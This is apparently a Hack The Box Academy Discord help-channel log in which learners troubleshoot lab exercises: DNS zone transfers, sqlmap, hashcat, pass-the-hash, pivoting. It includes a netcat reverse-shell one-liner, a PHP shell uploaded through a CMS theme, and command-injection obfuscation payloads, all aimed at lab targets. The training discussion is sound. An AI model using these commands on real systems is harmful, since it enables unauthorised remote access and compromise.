if you find nameserver add it to host file

omg

what is that error?

just out of curiosity

what error

the communications error

time out?

yes

module: SQL Essentials, Case5. I ran the following command but the flag was empty. Did I miss something?

that port in that ip is closed or that ip is not even turned on

was I right in my assumption its the dns server I'm communicating with trying to communicate with another dns?

no

@undone narwhal any hints or solutions

the dns server here is the machine spawned in the exercise

so who is trying to connect to that third ip?

So does that mean we 'drag and drop' the file into the command line that the RDP session is running in' ?because I did and I am not seeing the file on the target machine.

The target server is the authoritative name server of the domain

you can check it with a nmap scan over port 53

what ip dude

the 10.200?

└─$ dig afxr inlanefreight.htb @10.129.42.195
;; communications error to 10.200.60.101#53: timed out

you have that ip in the hosts file

oh

pointing to inlanefreight.htb

change to the new ip spawned

i feel stupid, thank you

Always delete all unnecessary entries from the hosts file.

dont feel@

I'm spinning the box wait

we are all have been there

wait, i got that in the parrot instance

how

just let me try my host file, I'll look again

@undone narwhal thx

copy and paste the .exe

not the path

yeah not the issue:

my hosts file:

#Custom
10.90.60.80    foophoneels.com
10.129.142.95   unika.htb
10.129.121.206    s3.thetoppers.htb thetoppers.htb
10.129.168.221    ignition.htb
10.129.95.184    base.htb

i dont see inlanefreight.htb

right, but then it wouldnt be direected to that third ip either

and I got that within the parrot instance

as well

the dns server is the ip spawned

ok

check with nmap

if u want to

I know that

point inlanefreight.htb to that ip in the hosts file

then you will be able to to a zone transfer

that is a weird behavior that shouldn’t be happening

This is not necessary. You only need to specify the IP as the server.

for me it wasnt working

with only the ip

needed the domain name

I clicked on the mouse button and selected copy and then paste and it still copied the path. I tried cut and paste and it still copied the path

idk hahaha

for me it wasnt working without the hosts file entry

it works perfect

but i think you are supposed to paste it on the rdp screen

yeah it is working, it was the hosts file

You only need the entry in the hosts file if you specify a domain instead of the IP. But then your system must resolve the IP first. So additional DNS requests are necessary.

I'm confused about the error, but the solution is correct

inlanefreight.htb is a domain

yeah, I still dont understand where the third ip came from

for me it wasnt resolving

Oh okay that worked

probably something related with cache

since it seems an IP from the exercises

Yeah, but not for the NameServer

This is the Standard Hosts File from the PwnBox

as i said

for me it wasnt working

Hello Guy, i am confused on the Nessus Skills Assessment.

I primarily used my own VM to SSH with htb-student credentials, after login, i checked the Nessus service but it returned this Unit nessusd.service could not be found.

Any clarification about this Navigate to the web interface at the end of this section and log in with the provided credentials.

and i remember it perfectly xD

i always use my own VM

well I appreciate it!

it takes some time to spawn

you can get into the nessus dashboard through https in your browser

port 8834 (?)

Then you have done something wrong 🤷‍♂️

the same you did

dig axfr domain @DNSserverIP

Hi, can anyone help me ?

The printscreen above has just been made now.

idk how they set it up

but from my vm wasnt working

which is weird

ive never used pwnbox tho

Which module do you need help with?
It is not about an Academy module? Then read and follow #welcome to find the right channel

This actually has nothing to do with the VM.
With the parameter @IP you tell dig, it should query the NameServer X.

what more can i say here xD

Please, Using the VM or the pwnbox, i don't understand very well

i just told you what happened to me

if VM you need vpn connection before

apart from that is the same

@undone narwhal are u still trying?

I am doing diploma in computer science 1st year. I want to become an ethical hacker by studying Diploma parallel. Can anyone help how can I become??

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

What I find interesting is that if you specify an IP address, the hosts file is never queried.

i dont know, its ok

I will confirm that is what happened to me as well, I'm confused by it

probably some conflict

with etc hosts and actual DNS server

yes, me too

Let me fix ya name

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

😊 thx

@novel matrix thx

The hosts file is requested whenever the computer needs to resolve a domain.
But if you specify an IP address, then it does not have to be resolved. So there is no request from the hosts file.

that's what I was thinking, the domain is just the query in this case, not the destination

thats why im thinking it was some conflict

from somewhere it was calling to that 10.200 ip

section? and module is SQLMap essentials

I think it has to be something like that, some bug in the terminal parsing perhaps

module: SQLMAP Essentials, section: Attack Tunning , exercise Case5.

ignore some of my headers, i copypasted the request from Edge

I see, you use the '*' after the 1.

sqlmap should detect it automagically but yeah

i like to add it if i know where is the injection point

for the flag string, i think the risk option is the key here

but i also used level=5

its a kitty

and the prompt is powerlevel10k

alright, before I was able to finish the error returned and I can't get it to go away. I've spawned to instances of the dns server and also tried just working from the pwnbox. I'm not really sure what's wrong, but I do know for certain now that isn't a complete response.

┌─[us-academy-3]─[10.10.14.113]─[htb-ac-187154@htb-yqg1e9isbd]─[~]
└──╼ [★]$ dig afxr inlanefreight.htb @10.129.13.128



; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> afxr inlanefreight.htb @10.129.13.128

;; global options: +cmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 794

;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1



;; OPT PSEUDOSECTION:

; EDNS: version: 0, flags:; udp: 1232

;; QUESTION SECTION:

;afxr.                IN    A



;; AUTHORITY SECTION:

.            86400    IN    SOA    a.root-servers.net. nstld.verisign-grs.com. 2023102200 1800 900 604800 86400



;; Query time: 6 msec

;; SERVER: 1.1.1.1#53(1.1.1.1) (UDP)

;; WHEN: Sun Oct 22 15:42:03 BST 2023

;; MSG SIZE  rcvd: 108



;; communications error to 10.129.13.128#53: timed out

;; communications error to 10.129.13.128#53: timed out

;; communications error to 10.129.13.128#53: timed out

;; no servers could be reached

guys i need a roadmap for bug bounty for web

That is strange.
Restart the Target and try it again
Otherwise contact the support. Then they have to take a look at it.

https://academy.hackthebox.com/path/preview/bug-bounty-hunter

yeah I think I need to contact support, I've restarted it a few times

I have sent you printscreens via DM of how it should actually look.

I've had it work intermittently

I posted in community help... is there a better avenue?

Yes, contact the Support (green bubble)

Support usually does not read here

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

hey guys

is anyone able to help under the footprinting IPMI module?

accounts cleartext password

yez

i cannot crack this hash at all

you are not meant to do brute force methid

method

oh?

use the common wordlist

oh in metasploit?

brute force is for HP ipmi’s

no in hashcat

i wasnt bruteforcing it

im using a seclists wordlist

but it doesnt match

im wondering if its my hashcat query

|| hashcat -m150 -a 0 hash.txt passwordlist.txt ||

thats what im using

its crackable with rockyou

yeah im using rockyou

thats what it looks like

double check hash

you are using rockyou-20 🤦‍♂️

ive used all of them

skill issue them

then

Anyone have completed zipping ??

not the correct chat

I am stuck at uploading part

brute force attack ≠ dictionary attack

@rustic sage

K

you legend

didnt you use all?

🤣

yeah under seclists

seclists didnt have rockyou.txt it was only like 20-25-30 etc

thanks a bunch dude!

Sir ! Then where to ask ? 😅

read #welcome

and #rules

.

@prime stirrup have you seen this? https://askubuntu.com/questions/1168787/libreadline-so-6-issue-in-ubuntu-18-04

which module is this? ill see if i can do it on a pwnbox

DACL ATTACKS I

oh nevermind thats T3 rip

first locate the library with find

check if exists on the system

if exists is a PATH problem

yep, it exists in /usr/lib/x86_64-linux-gnu/libreadline.so.6

try ldconfig

tried that earlier, didn't helped

echo $LD_LIBRARY_PATH

what returns

ah, it return empty

yea

export it with the desired path

and im reading that library is no longer prepacked in any linux

the pth-net has to be kind of old

idontknow

so doing that path thing fixed it for that specific lib, but now new one:

./pth-net 
bin/net: error while loading shared libraries: libnetapi.so.0: cannot open shared object file: No such file or directory

yeah, pth-net is like 9 years old but reliable way to pass the hash with net rpc etc.

I can't also find a alternate way to pass the hash to add a user to a group

There are some other tools like crackmap iirc and impacket that allow pth

what module is this even?

#modules message

thanks! missed that

haven't done it, but I'd just try a different tool like Marcie said

me 2

problem is, I am unable to execute command or get shell using cme and many impacket tools

even trying with mimikatz to spawn shell with this user fails

a tool that can use a hash to add a user to a group is bloodyAD for example

oh haven't checked it out, thanks

it's a great tool, though sounds like not used or mentioned in the module

amazing, it worked flawlessly @hallow kiln. Thank you so much!

Hello everyone. So i decided to continue with https://academy.hackthebox.com/module/77/section/859. I did th enumeration, found login and password to admin, then used MSFCONSOLE and chose the right exploit: unix/webapp/get_simple_cms_upload_exec.i set password, rhosts, username, lhost and when i run exploit i just get
[-] 10.129.172.75:80 - Exploit aborted due to failure: no-access: 10.129.172.75:80 - Authentication failed

any idea why?

btw. TARGETURI was already set, i suppose that it's correct

you're welcome, glad you got it

can anyone nudge me in the right direction to find the answer to this quetion "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio."

i am in as root on the linux01

have gone to tmp dir

well, I've moved a bit forward, seems like the targeturi was indeed wrong :D, sometimes asking helps even when you don't get the answer

and? what's the problem

sorry man, i had to go out. Anyways so yeah i just tired it and it worked ill recommend HTB pwn box otherwise you will face some DNS issues

importing ticket a

there's two tickets for julio, one of them is expired

been looking a little at bloodyAd

cant figure out how it worked but impacket didn’t

tbh I don't know how you'd add someone to a group with impacket, never done it

Can any1 help me im doing the VULNERABILITY ASSESSMENT module. I have to do a nessus scan. But i don't want to wait for it finish. The module says that there is a file with all the data needed. But i can't find it anywhere.

it tells you which address you need to visit in the browser

ldap_shell.py

ah ok, definitely haven't used it

me neither but bloody rely on it

🤣

makes sense lmao

bloodyAD is great though, nice and intuitive

bloodyAD is using python ldap module to send the add user to group query

https://github.com/CravateRouge/bloodyAD/blob/8a5668117c7a15c28b50410e87c0235916efcf58/bloodyAD/cli_modules/add.py#L239

Checkout dacledit.py

that I've used at some point, still prefer bloodyAD

does anyone know, if the module with getsimple CMS web has broken the "upload files and / or images.." i've been trying like for 30 mins, but no pop up nothing for file upload appears

ooo

nice nice

there is the diference

gonna try it out

I need to check out bloodyAD it seems

Hi all, I need a steer please on 'Web Attacks - Chaining IDOR Vulnerabilities' - I've hit a brick wall trying to script something to enumerate users, and when I use the web_admin uuid etc to get the flag, I can't get that either, so if some kind soul would kindly point me in the right direction I'd be very grateful. Thanks in advance!

have you found the admin account

very good help menu and intuitive syntax, worth a look

any1 able to help?

in the nessus dashboard there are the scan reports

just use your eyes

they are in front of you after login in

login to what tho?

I told you, it tells you which address to visit in the browser

to nessus dashboard

follow module instructions

sorry couldn't tell if you were talking to me

i mean for you to do custom scan you have to also log in

it’s everything done through the web app

its not a cli tool

think its used by not knowledgeable people

they like GUI stuff

yea i get that nessus is throught gui but i just didn't get where to surf to, makes sense now

thanks

btw what other tool would you recommend? is nessus not proffessional?

I find nessus to be useless, probably good if you've got a license, but none of us do

Thank you!

btw. I will reply to myself again, maybe someone gonna read and will help :D. So i could not upload the files because it uses old FLASH unsupported. So i just edited some php file in theme and upload my script :). It works.

Hi, thanks for replying! I've been using the details in the lesson, but as I haven't cracked the enumeration script that could be the issue as the admin details in the lesson don't get me anywhere.

I think the session tells you how to enumerate the api for user info

Think about how you completed the previous section

can I get some help please. I started the macOS fundamentials, got this question: Where are the Applications related to the system stored at? I have tried /Applications, Applications, different variations but won't accept it.

OK, thanks for your time. I'll revisit - I must have missed something obvious. Cheers

Np

Good luck

but this one isnt from impacket

any other options?

is a custom fork

nothing will ever replace a pentest

you need manual job done

for vulnerability assessment nessus is the king

ok clear.

but is good to know

the software

in your professional career there are high chances for you to use it

Yep, I'd say the same, manual enumeration

But if you're at a company doing vulnerability assessments, you'd be using the professional version of Nessus, though you still gotta triage the results after

https://github.com/ThePorgs/impacket/blob/master/examples/dacledit.py

this one

ippsec used to add user to a group

thanks @worthy vigil for telling

i forgot about it completely

Yeah, I've used it at some point, I just don't like it 😁

happens

fakk want to finish pivoting module asap

want that AD fun

but for today is enough

Can I get some quick check on Web Fuzzing Skills assessment? 2nd question, "What are the different extensions accepted by the domains?", can someone just confirm me how many I should have? I think I have the right answer, just want to check if I missed something or just not inputting them right

there are 3 extensions

hum, need to filter something out then. Thank you!

no worries

the thick client stuff is so hard

impacket is unreal

learning raw ldap queries and ldapmodify is rad too

Hello guys I am pretty new to hackthebox,
I am currently on the last steps of the "Keeper" machine. I have extracted the ppk file and I created an id_rsa from it.
I am trying to do an ssh connection as root with the id_rsa and it keeps asking for a password.
I have also changed the privileges of the id_rsa (chmod 600 id_rsa) and it keeps asking for password.
Anybody has an idea?

Not the channel for this, read and follow #welcome

#boxes

Hi everyone, I need help with this question "Enable the http-log output in suricata.yaml and run Suricata against /home/htb-student/pcaps/suspicious.pcap. Enter the requested PHP page as your answer. Answer format: _.php" in Module Working with IDS/IPS. I did find the .php link but I am getting wrong answer message. Maybe I am using the wrong .php link. Can someone give me a little hint please. Thanks

Actually you only have to do what it says

Step 1
Enable http-log output in suricata.yaml

Step 2
Run Suricata against /home/htb-student/pcaps/suspicious.pcap.

Step 3
Read out the logfile

Module: AD Enumeration and Attacks
Section: ACL Abuse Tactics

I run this command given in the module: Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

I get the response: Unable to find user 'damundsen'

Did anyone else run into this problem?

Did you try Get-ADUser

And search for this user if it exists

The user would have to exist. Try to restart the lab

I did. I tried to check all log files there’s only one .php in that which is giving me an error:(

the expected answer is <name>.php no forward slashes and not the full URL/URI

Answer format: _.php

I restarted the lab and ran into the same issue. Here's the string of commands I've been running. Does anything look off?

Oh ok. Lemme try again if it works

The password in the $SecPassword variable is incorrect

Yep, I see that now. I was using the one for forend, not wley. Thanks!

why unreal

unreal = really awesome good thing

ahh

indeed

Method: SQLMAP Essentials, section: Bypasing Web Application Protections, case#8. I tried the following two commands, but didn't work. Why? POST /case8.php

i have the same command but id=1*

which of the two commands?

also the order should be --dump -D testdb -T flag8

any

I think I did that same mistake before. I need to remember to add the '*'.

this worked for me

Would it be easier to put those request headers in a file and use the -r parameter instead?!

Hi I am in AD Assessment part 2, I have gotten SYSTEM on SQL01. I don't know how to start on MS01.

When I dump LSA hashes on SQL01 I got Administrator and its NT hashes which I could use to evil-winrm to SQL01. I have always wondered these are local administrator and not the AD administrator account right? It is not possible to reuse this NT hash to pth to other machines?

I'm getting the annoying "Warning: Potential security risk ahead" message when using burpsuite even though I've already added the burpsuite certificate. It happened when initially going to the web interface for the target machine too, so I'm wondering if it's a HTB issue rather than burp issue at this point.

I guess in this case not a HTB issue, but rather a need for a certificate from HTB.

Not HTB issue

Okay, never had this issue when I was running kali from a live usb. Now that I'm running in a VM this seems to be an issue. Are there any resources on how to remedy this?

Do I need to install a CA certificate from HTB? That's what I had to do with burpsuite.

For the "Shells and Payloads Live Engagement" is there any way to avoid using the foothold machine as the main interface? It is unreasonably slow.

BROKEN AUTHENTICATION

Weak Bruteforce Protections

• I used a short wordlist with the provided python bruting script in the module:
  python3 brute0.py /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt
  This is the error:
  (Please help)

UPDATE:
I tried to include "X-Forwarded-For": "1.2.3.4" Inside of burpsuite and it works but I still cant get a working wordlist for a successful login

Is there any other way to complete the Shells and Payloads section without having to use the supplied RDP machine? It is not functional.

To clarify, it responds, but it takes about 10 seconds to respond.

hi, is it all right not to follow the sequence of the modules in SOC Analyst Job Role path? I want to finish all "easy" modules first.

Couldn't blame u

Nowadays everything is labeled one level below the real level

But no, if u do that, the HTB devs will all crowd ur house with pitchforks

all right, might as well abide to the sequence. thanks a lot

There's a reason for the order, you'll find that some modules use techniques referenced in others that you'd have 0 idea about

anyone here?

Nope

How long does the "Request Help" feature take for paying members?

Hello

Hey goodnight im doing Attacking Common Applications - Skills Assessment I the last question is giving me some trouble can i get a nudge

quick question, I'm doing the windows privilege escalation module, section citrix breakout, its asking me to go to " \10.13.38.95\share" I'm trying to connect to it, used my own VM's IP but still nothing?

Did you set it up as in the example/section?

Yeah, I set up a SMB server on the host machine, cant seem to get it to work for some reason

if I try connecting to my VM's IP or the IP they gave me I just get this error every time

How does the request help feature work for paying members?

It's been almost two hours now and no assistance.

Considering its late night you're probably just gonna have to wait

Hi, I'm currently doing the Password Attacks module doing the Lab - Hard Section. I can't seem to brute force ||johanna's|| password. I have seen people suggesting to use ||crackmapexec||, which I was already using. I let this thing run for hours today and never got a password. I'm using the mutated password list from earlier in the module, which I've used throughout the module without a problem, so I don't think that's the issue. Here's the command I've been using: || crackmapexec rdp 10.129.16.84 -u johanna -p /home/kali/Documents/htb/passwordAttacks/password_mut.list || I've also tried using the same command with ||smb instead of rdp.|| If anyone has any suggestions, please let me know because I'm not sure what I'm doing wrong.

... because 10.13.38.95 isn't the ip address it's hosted on

It'll be YOUR vm's ip

10.10.x.x

I can see ya help request. You gotta be patient

And is still the weekend for most as well

You also probably could have just asked your question here and got a faster response just sayin

^

I'm not saying the help feature is useless, especially if you're 99% sure you did it right and the lab env is just borked

Which happens

The answer to the question they have is completely incorrect and is something the community can happily answer

Give me a minute to check my notes I'm 99% sure I did smb first but could be wrong one min

If I could I'd be soooo tempted to attempt cpts on a tethered network connection

Appreciate it

I’m going for CDSA and maybe CBBH

The foothold box on the Shells and Payload Live Engagement is not functioning. I can interact with it, but everything lags by at least 10 seconds.

Was hoping for a viable alternative.

Set up a proxy via ssh port forwarding

I don't see that option

There is no real "alternative" mostly because the targets are on a shared internal network with the jump host

That's fair considering pivoting isn't discussed until a later module

But also consider: is your network stable, are you using udp or tcp for your vpn

Are you running on dial-up

Need to reup my notes but it looks like I was able to get smb perhaps you're missing a flag like -local-auth or something

My network is doing fine. I'm using the VPN file provided by HTB. The problem is the foothold box, it's just comically slow.

I refer to the udp vs tcp download, tcp is just more stable

I'll try again tomorrow and see if I get some support by then. Thanks!

I'll give that a try thanks

I used my own vm IP too, same issue

so for attacking common applications skill assessment 1 i was able to use the cgi to navigate to the flag but im not able to read the flag... what am i missing?

Looks like you're running a dir command Replace that with type and add flag.txt to the end of your query

@fathom pendant I figured it out, was using it on the wrong vm.. -_-

Happens

Completely forgot Im using a VM inside a VM >.>

@fathom pendant the command runs because i get a 200 request , but unfortunately the page is blank i checked the source as well . I tried with type/more

Bruh why?

it wouldnt be an option you 'see' itd be something you setup

Using online box, my own vm has internet issues

Hey guys, how you doing? Might givin me small hint about
https://academy.hackthebox.com/module/77/section/859

I got the first task, I run the LinEnum.sh script too
but I cannot find any .sh file I could upload my
'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.140 8443 >/tmp/f'|tee -a file.sh
I tried to convert it to php and uploaded in theme .php but it didn't work 😦

@fathom pendant am I entering the command wrong or am I cursed?

without sudo I get permission denied

smbserver.py is probably not 8n roots path

^

so you run without permissions and it doesnt have proper perms to run, and with perms it cant find it

need to install globally or provide the full path

I'm using the box they give you though

so?

locate smbserver.py

sometimes you gotta grease your tools a little to get em to work

^

I had a tool recently I couldnt get its pathing sorted out so Ive resorted to sudo $(which tool) --args

lmao

lmao, I located smbclient.py, copied it to my current directory and it still says it cant find it wtf

im not sure why pwnbox even messes with the default impacket paths

actually nvm I'm going insane, I have the .py file in the same directory

./

thank you, it works. my sanity is saved.

on a normal kali vm youd just install impacket and use sudo impacket-smbserver

pwnbox gotta be weird about it though

This ain't even pwnbox its a jump host

Yeah, I'm kinda not used to having to manually sort the command out, I'm too use to just having the short cut available.

oh weird

anyways thanks Lee and Mad ^^

@rustic sage don't dm without consent #rules

Hey can anyone help me with Linux fundamentals module's containerization section

I m not able to work my way around lxc commands

The commands given seems to not work the way they have been described

can someone help me with logrotate privilege escalation

idk how to trigger the logrotation

its just a copy paste from browser devtools.

copying in a file is an extra step

you solved?

nothing seem to happen :( there is no logrotate.conf

ok i got it

Watch the video “book” from ippsec

Hi I am in AD assessment 2 any nudge for getting into MS01 (question 8)? I have system on SQL01.

check the "hives" and use crackmapexec to see where you have a hit

There will be a more advanced path/cert than the CBBH in a more or less far future, no?

since i saw some more "advanced" modules but the price isnt cheap at all

Hello everyone! Facing troubles with network connection - it always disconnects. Module Password Attacks Section:Pass the ticket from linux. Does anyone having same troubles?

ping 10.129.240.165
PING 10.129.240.165 (10.129.240.165) 56(84) bytes of data.
^C
--- 10.129.240.165 ping statistics ---
41 packets transmitted, 0 received, 100% packet loss, time 41027ms

Downladed new vpn file tcp and now it doesnt disconnects anymore - but still cant rdp

The machine may not be reachable via ping.

it is

ping -c 1 10.129.199.218
PING 10.129.199.218 (10.129.199.218) 56(84) bytes of data.
64 bytes from 10.129.199.218: icmp_seq=1 ttl=127 time=37.2 ms

--- 10.129.199.218 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 37.200/37.200/37.200/0.000 ms

rdp: now logon failure - suddenly login doesnt work anymore

my bad - had wrong pass 😦

Do I have to ssh into the target machine initially for the sectiomn of this module ? I tried the username and password in the hint and it failed.

Create your own wordlist, with the term you found in the hint

The hint is meant to nudge you. The password is in the huge mutated wordlist

Modul:Password Attacks Section:Pass the ticket from linux - Network problems- chisel client form MS01 doesnt connets to chisel server -- really annoying

On attack box: sudo ./chisel-linux server --reverse On MS01:chisel.exe client 10.10.15.38:8080 R:socks
2023/10/23 05:19:52 client: Connecting to ws://10.10.15.38:8080
2023/10/23 05:20:13 client: Connection error: dial tcp 10.10.15.38:8080: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.

Try it from the PwnBox.

Why PwnBox - its so slow

It should also work without it 😦

Yes, but if there are connection problems, then try the PwnBox

having multiple VPNs being connected to academy won't make the connection faster

The problem with PwnBox is the keyboard - dont have an us keyboard - instead swiss german

so cant type there correctly

guys am on mssql server right and i dont have the permision to run xp_cmdshell i can only xp_dirtree

how can i download afile in this situation

I also have a Swiss keyboard, but it works. Not super well, but for testing it works.

Try to switch the VPN from EU to US or from US to EU. From TCP to UDP or from UDP to TCP. Experiment a bit with the settings.
As dpgg already said. Disable all other VPN connections.

This about Manager?

in generale like cuz in the module of attacking common services they didnt mention this

or am missing it

in my notes

idk

The modules don't teach you everything there is to know

@acoustic owl with PwnBox it works

but why not without it

i should work

wasted hours of hours of time making it work

Then it is your connection
As written, try another VPN location, TCP or UDP and disable all other VPN connections.

👀

i have protonvpn also running but this shouldnt cause the issue isnt?

@acoustic owl what do you mean by disabling all other vpn connections? only have one

this can disrupt the connection

Deactivate it and then try again

ok i give it a try

doesnt work either

even with different vpn files

@acoustic owl do you have a prefered vpn file?

I usually take US and TCP.

@acoustic owl just wont work, indepentent of wich vpn file i use -- aannooyyiinngg

But it is obviously due to your connection. It works with the PwnBox.
Based on your statement that you are using a CH keyboard, I assume that you are coming from there.
No idea what provider you use, or what software you use that could limit your internet traffic. But if you don't live in a mountain village, you should have a stable internet connection and no problems.

Guessing my vpn connection is quite good! Dont live in the mountains :). Dont think thats the issue. Asuming it has to do with the box setup

@acoustic owl Maybe you can give it a try? Would really appreciate it

reach out to support via the website

As soon as I am at home I can test it

Probably a select file into outfile type of scenario @orchid pine iirc attacking common services does refer to this

like i found it

select into out file isnt for writing

@acoustic owl thx

Stuck on this room
https://academy.hackthebox.com/module/112/section/1069

• 1 What is the FQDN of the host where the last octet ends with "x.x.x.203"?
  Getting ns record query failed: NIXDOMAIN
  When tryin to enumerate dns servers

Subdomains of subdomain

Find all Zones

^ ns query isn't really gonna be too helpful for this

oh k nice idea

It's not an idea, it's how the answer is structured

Lol

was only looking at first level subdomains

If the answer isn't in the first level...

if you dont have and you cant enable it, the path is different. With xp_dirtree and/or xp_subdirs you can try steal NTMLv2 challenge and crack offline

also relay attack is possible with authentication challenges

there's more you can do but it concerns an active box

ah !!

didnt know

talking in modules

it's manager, newest windows AD box, you should check it out

if its an active box just try harder 🙂

i would, but too focused on modules

want to finish and start with prolabs

hey guys

I took a break from the modules to do Zephyr, I recommend it

can somebody give me an example of: In a first step, the SSH server and client authenticate themselves to each other. The server sends a certificate to the client to verify that it is the correct server. Only when contact is first established is there a risk of a third party interposing itself between the two participants and thus intercepting the connection. Since the certificate itself is also encrypted, it cannot be imitated. Once the client knows the correct certificate, no one else can pretend to make contact via the corresponding server.

what would an attack like that look like?

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> axfr dev.inlanefreight.htb @10.129.177.237
;; global options: +cmd
; Transfer failed.

any idea why this is happening

😋 im jealous

what attack? this is just an explanation of how authentication works

"Only when contact is first established is there a risk of a third party interposing itself between the two participants and thus intercepting the connection. "

i want to see what that would look like

#1165345722531590284 man crazy that there's a channel for a new box

and what that type of attack is called

is there any place i can read up on it

many reasons…

man-in-the-middle attack

mitm ig

thank you! 🙂

one of them, transfer zone not enabled for your ip

or not enabled at all

or not a zone

Could be that you can't transfer to that subdomain but iirc you have to use the brute force tool

axfr risk is that you get the whole network scheme with 1 command xd

btw is there a way to copy stuff into the attackbox

since i can only copy out of it but not into it

@quasi jungle are you using virtualbox or webclient box?

webclient box

figured it out had to reset target and it worked

I would copy paste the content of a file and then paste it in the box

I can't paste into the attackbox it just doesn't render there

You need to enable clipboard sharing iirc there's also a clipboard button

clipbox down right

Sir, respectfully, that's the right

Right you are 😏

Actually I'm center-left

Yea worked didn't even notice the button

I prefer using my own vm but hey to each their own

Is there anyone here with a vacant spot on their team for me to join in the upcoming Capture The Flag (CTF) competitions? I have prior experience participating in picoCTF and am now looking to challenge myself by participating in the HTBCTF.

thanks in advance

This is completely unrelated to this channel read #welcome to see how to gain access to more of the server

oh
sorry about that ..

I'm currently reviewing my notes, and I have a question regarding "AD Enumeration & Attacks - Skills Assessment Part I" Q2. I found the answer to the question. I ran BloodHound and found several Kerberoastable accounts, but my question is: How do we know that this particular account is the one that should be targeted and will lead to further escalation until reaching the DC? BloodHound doesn't show anything useful, just a list of kerberoastable accounts.

It looks like a service account, those are commonly misconfigured with elevated permissions

But also, unless you have a reason to not want to generate too many alerts, kerberoast everything 😁

ok makes sense

help python module hijacking

the sticky bit is not working

oh crap i just realised its not SUID bit

Hi All
Could you please help me?
I'm doing Privileged Access in AD module and I'm trying to connect from Win to ssh because I need to use mssqlclinet

I don't know how can I connect to this damundsen user with SQL1234! password

when I'm trying to connect via ssh there is no connection between 172.16.5.150 address

You need to first spawn the target machine, you're never gonna get to 172 because it's on a different network

yeah I'm connected to the target via rdp

and on this target I'm trying to connect via ssh to damundsen

with 172.16.5.150 IP

This image you provided doesn't support that you're rdp into that target machine

Show above where it will either have "spawn target" or the ip

one moment because it terminated itself

you want a ss with rdp connection?

Sure

ok one moment because in this module there are some issues with connection 😉

Try using a different vpn server and the tcp download

So I thought that from there I can connect to 172.16.5.15 via ssh

but it's not working

Reread the section perhaps

You might have missed something

One time you say .15 other you say .150, which is it

I saw that there is option to connect to 172.16.5.225 htb-student:HTB_@cademy_stdnt! but it also not working

.150 sry

When you type ipconfig, is the system on a 172.16.5 network

172.16.5.25

So why would you try to ssh, to your own machine, in this instance

Secondly what does the command look like when you're trying to ssh to (what I'm assuming is DC) as damundson

ssh user@ip?

so in that case ssh damundsen@172.16.5.150?

i have a ticket for admin loaded on the klist cmnd how can i use it

to do things

Idk

Is the ssh on that port, or does the module indicate a different port

not sure how can i check that

The question might tell you

I don't know :/

I haven't done this module so I can't tell you what you're doing wrong tbh

I'm like trying to do this connection 4 hours and still don't know how can I do it XD

hello guys my question is i have a ticket for admi loaded in klist

but i cannot acces the admin dir

plzzz

Need more context, what module are you doing, what section, are you sure the ticket is valid

yeah

Module: PIVOTING, TUNNELING, AND PORT FORWARDING
Section: Skills Assessment
Question: In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?

Ive been attempting to transfer files to/from || 172.16.5.35 || to my attack host but I haven't been successful. Can someone help shed some light on what Im doing wrong? Ive tried a number of methods that should have otherwise worked (scp, wget, curl, etc) but either files downloaded from || 172.16.5.35 || come back empty or files uploaded from my attack box fail.

Can you ping your attack host from the target? :) that'll answer your question you need to do a bit of bouncing around

I dont see what's not working

I see you got a return for ls /

¯_(ツ)_/¯

I dont see a file.txt in that root directory?

Yeah lol

You did ls /

Does the output you see have a file.txt?

You mean the one after the #?

2

Now I see

¯_(ツ)_/¯

Haven't done this module so can't tell you how you're being dumb

Usually the case

I know that if I cancel my student subscription, I lose access to the incomplete modules, but if I buy the student subscription again, the incomplete modules wont be restored, right?

That's probably a better question for support tbh, but I wouldn't think so

As far as I know, you simply don't have access without a subscription. But the progress remains. To be absolutely sure, ask the support

okay thank you, I will ask them then

No you dont lose access to anything 😉

Without a subscription, he only has access to completed or purchased modules.

this is the txt for the flag after the GIF8

Since it was his question lmao

That was the answer to your statement, which is obviously wrong.
#modules message

For Command Injections: Advanced Command Obfuscation, I'm attempting to find a way to make $(a="WhOaMi";printf %s "${a,,}") work (not the question, just the exercise), but I'm not able to get it work.
I've attempted to replace the ; as well as the spaces, but nothing outputs with regards to the whoami command. Can anyone assist?

Stuck on the Intro to Assembly Language - Data Movement module. No matter what I try, I keep getting a wrong answer

"Add an instruction at the end of the attached code to move the value in "rsp" to "rax". What is the hex value of "rax" at the end of program execution? "

Any hints on this question? Please

By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer.

from
Windows Event Logs & Finding Evil Mini-Module
skill assessment

pic of code ur using

press b

I figured it out lol was doing mov rax, rsp which was wrong.

Yeah it worked now. Thanks

; is filtered right so dont use it

Already mentioned that I replaced ;.

replaced with what?

${LS_COLORS:10:1}

how about you dont use it at all?

?

hint: ||new-line||

Awesome, that worked. Thanks!

So there is no way to use a direct replacement for ;? I have to use another operator?

There could be, but thats how i did it

cool thanks.

In the questions section

It says

Vhosts needed for these questions:
App.inlanefreight.local
Dev.inlanefreight.local

And I'm not sure what to do😬

add those to /etc/hosts pointing to the IP , example

10.10.125.101       Dev.inlanefreight.local  App.inlanefreight.local

Thanks man🤝

fuck im such a noob

i dont know php so this Three is kicking my butt

complete noob here.....
anyone know of ways to practice parrot, ssh, reverse shells, and nmap.
i dont want to look the web to practice, but i feel like i need to practice a bit before moving further. (outside reading man and help.)

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

that's what academy is for, if you're a noob, go there and start learning

